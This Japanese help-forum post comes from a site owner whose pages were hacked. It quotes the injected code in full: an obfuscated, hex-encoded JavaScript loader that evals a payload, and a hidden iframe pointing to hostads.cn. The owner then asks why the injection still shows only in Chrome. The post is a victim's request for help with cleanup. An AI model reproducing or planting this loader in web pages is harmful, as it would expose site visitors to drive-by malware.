私のウェブサイトがハッキングされたか、エクスプロイトが見つかったかなどのようです。特定のページを読み込むたびに、次のjavascriptとiframeが挿入されます。
<script language="JavaScript" type="text/javascript">
B76197C940748B="pars";B76197C940748B+="eIn";B76197C940748B+="t";DCEC79103="St";DCEC79103+="ring.";DCEC79103+="fr";DCEC79103+="omC";DCEC79103+="harCo";DCEC79103+="de";function E0D7700E45C574E(A911795){var B3593798FBC66C=370;B3593798FBC66C=B3593798FBC66C-354;D086A805=eval(B76197C940748B+"(A911795,B3593798FBC66C)");return(D086A805);}function A41D3C153B9E8(E02A0){var D49C4143=940;D49C4143=D49C4143-938;var FB8E017784670AD="";for(E1709AB22C52CD=0;E1709AB22C52CD<E02A0.length;E1709AB22C52CD+=D49C4143){FB8E017784670AD+=( eval(DCEC79103+"(E0D7700E45C574E(E02A0.substr(E1709AB22C52CD,D49C4143)))"));}eval(FB8E017784670AD);}A41D3C153B9E8("69662028646F63756D656E742E636F6F6B69652E73656172636828227574626F3D382229203D3D202D3129207B0A7463707A3D646F63756D656E742E676574456C656D656E7442794964282771757A676327293B6966287463707A3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71757A6763207372633D687474703A2F2F686F73746164732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20227574626F3D383B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
</script>
<iframe id="quzgc" src="http://hostads.cn" style="display:none"></iframe>
すべてのパスワード(コントロールパネル、データベース、ftpなど)を更新し、すべてのページ、phpファイル、javascriptファイルなどの悪意のあるコードを削除しました...すべてのアクセス許可も修正しましたファイルとフォルダを755に設定します(感染したページは777に設定されました)。
この問題は、Internet Explorer、Firefox、Opera、Safariで解決されたようです。ここではすべてが正常に機能し、悪意のあるコードは挿入されなくなります。しかし、Google Chromeを使用して自分のWebサイトにアクセスすると、有名な「警告:マルウェアが検出されました」ページが表示され、Googleが悪意のある既知のWebサイトである「hostads.cn」のコンテンツを検出したことがわかります。次に、ソースコードを調べると、コード内にjavascriptとiframeの特定の部分が含まれていることがわかります。
Webサイトをデバッグし、コードを段階的に調べて、コードを挿入している場所や内容を確認しようとしましたが、実際には何も見つかりません。そして、他のすべてのブラウザもそれに苦しんでいないようです。
もう1つの奇妙な点:ページを「感染」させると、次のようになります。つまり、Chromeからの警告を無視して、Webページに進むと、ソースに悪意のあるコードが表示されます。しかし、FTPでその特定のページをダウンロードすると、すべてが完全に正常に見えます...
では、なぜこの悪意のあるコードがGoogle Chromeだけに挿入されているのに、永続的な方法では挿入されていないのでしょうか。そしてもっと重要なこと:私はそれに対して何ができるでしょうか?
ありがとう。